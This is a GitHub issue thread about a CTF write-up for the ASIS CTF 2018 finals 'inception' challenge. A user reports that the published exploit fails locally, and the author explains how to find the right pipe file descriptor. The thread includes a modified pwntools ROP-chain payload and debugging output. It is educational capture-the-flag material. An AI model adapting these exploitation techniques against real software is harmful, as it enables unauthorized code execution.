### ISSUE TITLE
about asis ctf 2018 finals inception 

### ISSUE THREAD

**Issue by shadowwander** [balsn/ctf_writeup#3]
hello,when i use your payload,i found that the parent process is alwasys waiting for input,and the child process is defunct
~:ps -ef|grep inception
20663  20660  0 17:26 pts/10   00:00:00 ./inception
20664  20663  0 17:26 pts/10   00:00:00 [inception] <defunct>
whatever i sent to the process,it won't react,like below:
gdb attach 20663
   0x7f62854fa257 <read+7>:	jne    0x7f62854fa269 <read+25>
   0x7f62854fa259 <__read_nocancel>:	mov    eax,0x0
   0x7f62854fa25e <__read_nocancel+5>:	syscall 
=> 0x7f62854fa260 <__read_nocancel+7>:	cmp    rax,0xfffffffffffff001
   0x7f62854fa266 <__read_nocancel+13>:	jae    0x7f62854fa299 <read+73>
   0x7f62854fa268 <__read_nocancel+15>:	ret    
   0x7f62854fa269 <read+25>:	sub    rsp,0x8
   0x7f62854fa26d <read+29>:	call   0x7f62855180d0 <__libc_enable_asynccancel>

pwntools output:
[DEBUG] Sent 0x31 bytes:
    00000000  54 52 41 4e  53 4d 49 53  53 49 4f 4e  5f 4f 56 45  │TRAN│SMIS│SION│_OVE│
    00000010  52 00 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │R·aa│aaaa│aaaa│aaaa│
    00000020  61 61 61 61  61 61 61 61  6a 82 44 85  62 7f 00 00  │aaaa│aaaa│j·D·│b···│
    00000030  0a                                                  │·│
    00000031
[*] Switching to interactive mode

[DEBUG] Received 0x8 bytes:
    'Yeah tha'
Yeah tha$ ls
[DEBUG] Sent 0x3 bytes:
    'ls\n'
$ ls
[DEBUG] Sent 0x3 bytes:
    'ls\n'
$  

could you write a writeup that works in the local machine and take a screenshot,thanks

FYI: https://balsn.tw/ctf_writeup/20181124-asisctffinal/#inception

**Comment by b04902036** [comment]
Fisrt, the parent process communicate with the child process through PIPE. And the PIPE file_descriptor number may vary due to some reason, however it should always be the same if the program is running in same environment. So I simply bruteforce it start from 4, and found that the remote PIPE file_descriptor should be 6, and the PIPE file descriptor should be 10 in my local environment.
To modify my script, simply change the two line after first `time.sleep(1)` from 
```
payload = 'ASIS{N0T_R34LLY_4_FL4G}\x00'.ljust(0x20, 'a')
payload += flat([buf-0x400, pop_rdi, 0, pop_rsi_r15, buf-0x400, 0, pop_rdx, 0x400, read_plt, pop_rdi, 10, pop_rsi_r15, buf-0x400, 0, pop_rdx, 0x400, write_plt, main_exit])
```
to 
```
import sys
fd = int(sys.argv[1])
payload = 'ASIS{N0T_R34LLY_4_FL4G}\x00'.ljust(0x20, 'a')
payload += flat([buf-0x400, pop_rdi, 0, pop_rsi_r15, buf-0x400, 0, pop_rdx, 0x400, read_plt, pop_rdi, fd, pop_rsi_r15, buf-0x400, 0, pop_rdx, 0x400, write_plt, main_exit])
```
now you can use, for example,  `python exploit.py <guessed fd number>` to bruteforce which fd number is used in your local environment.

Another smarter way is as follow.
## Clean all zombies
`pkill -9 inception`
## Stop the exploit before it send any payload
add `raw_input('#')` right after `r = remote(host, port)`, therefore, it won't send any payload, but it will just start the process
## Find pid
`pidof inception`, there should be two numbers show up, the bigger one should be child process.
here is my result
`89367 89366`
## List all file descriptor
`ls -l /proc/<fill in pid here>/fd`, then it will print out all file descriptors.
here is my result
```
ls -l /proc/89367/fd
total 0
lr-x------ 1 jason jason 64 十二  6 15:02 0 -> 'pipe:[596846]'
l-wx------ 1 jason jason 64 十二  6 15:02 1 -> 'pipe:[596847]'
l-wx------ 1 jason jason 64 十二  6 15:02 10 -> 'pipe:[595763]'
lrwx------ 1 jason jason 64 十二  6 15:02 2 -> /dev/pts/3
lrwx------ 1 jason jason 64 十二  6 15:02 3 -> 'socket:[595271]'
lrwx------ 1 jason jason 64 十二  6 15:02 4 -> 'socket:[594602]'
lr-x------ 1 jason jason 64 十二  6 15:02 5 -> 'pipe:[596846]'
lr-x------ 1 jason jason 64 十二  6 15:02 6 -> 'pipe:[595762]'
l-wx------ 1 jason jason 64 十二  6 15:02 7 -> 'pipe:[595762]'
l-wx------ 1 jason jason 64 十二  6 15:02 8 -> 'pipe:[596847]'
lr-x------ 1 jason jason 64 十二  6 15:02 9 -> 'pipe:[595763]'
```
```
ls -l /proc/89366/fd
total 0
lr-x------ 1 jason jason 64 十二  6 15:02 0 -> 'pipe:[596846]'
l-wx------ 1 jason jason 64 十二  6 15:02 1 -> 'pipe:[596847]'
l-wx------ 1 jason jason 64 十二  6 15:02 10 -> 'pipe:[595763]'
lrwx------ 1 jason jason 64 十二  6 15:02 2 -> /dev/pts/3
lrwx------ 1 jason jason 64 十二  6 15:02 3 -> 'socket:[595271]'
lrwx------ 1 jason jason 64 十二  6 15:02 4 -> 'socket:[594602]'
lr-x------ 1 jason jason 64 十二  6 15:02 5 -> 'pipe:[596846]'
lr-x------ 1 jason jason 64 十二  6 15:02 6 -> 'pipe:[595762]'
l-wx------ 1 jason jason 64 十二  6 15:02 7 -> 'pipe:[595762]'
l-wx------ 1 jason jason 64 十二  6 15:02 8 -> 'pipe:[596847]'
lr-x------ 1 jason jason 64 十二  6 15:02 9 -> 'pipe:[595763]'
```
you can see that in my case, the pipe these two processes are communicating through is `pipe:[595763]` 
(Of course you can use any debugger to attach to the process and see which file descriptor it is reading/writing to)
I will add some comment to my writeup soon, thank you for your correction ：）

**Comment by shadowwander** [comment]
Yes,I got it.Thank you very much,I have learnt a lot from you.Best wishes
